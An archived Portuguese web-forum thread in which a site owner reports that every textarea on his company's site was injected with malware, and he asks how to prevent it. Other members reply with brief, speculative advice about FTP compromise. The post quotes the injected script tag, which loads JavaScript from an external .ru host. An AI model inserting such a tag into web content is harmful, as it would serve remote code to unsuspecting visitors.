[Arquivado] Ataque com MALWARE

[nlopes 0]

Caros colaboradores;

 

Essa semana me deparei com um certo problema.

 

Fiz uma pesquisa no GOOGLE, para acessar um site desenvolvido pela empresa em que trabalho. E tinha a mensagem: "Este site pode danificar seu computador." e nao deixava eu entrar no site.

 

Tentei entrar no site e nao consegui. Lendo alguns artigos, identifiquei que existe um MALWARE no site.

Esse MALWARE foi introduzido em todos os campos TEXTAREA, e tem alguns com o componente "WYSIWYG" que podemos organizar o texto e quando salvamos ele salva as TAGS HTML no banco.

 

Identifiquei que tinha essse codigo JS em todos os texArea do meu site. <script src=http://www.4vrs.ru/ngg.js></script>.

 

Já retirei esse codigo.

 

Mas o que tenho que fazer para evitar esse tipo de ataque??

 

alguem ja passou por isso?

[Mário Monteiro 179]

Siga as instrucoes deste topico e post um log http://forum.imasters.com.br/index.php?showtopic=165906

 

Estou movendo apra area correta

 

ASP :seta: Segurança & Malwares

[nlopes 0]

Não eh meu caso.

 

Gostaria de saber, como meu site foi invadido, como o "hacker" conseguiu infiltrar uma tag js "malicioso" no meio dos dados do meu site.

[Silas Martins 0]

Como o hacker fez isso? existem dois metodos básios brute force (invasão na força bruta) ou Engenharia Social (esse despreende tempo e mais desgaste) feito isso ele tem seu ftp em mãos ele pode fazer qualquer coisa que ele bem entenda.

O que você tem a fazer é alocar seus dados em um servidor mais seguro

[Mário Monteiro 179]

Tópico Arquivado

 

Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado.

 

Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.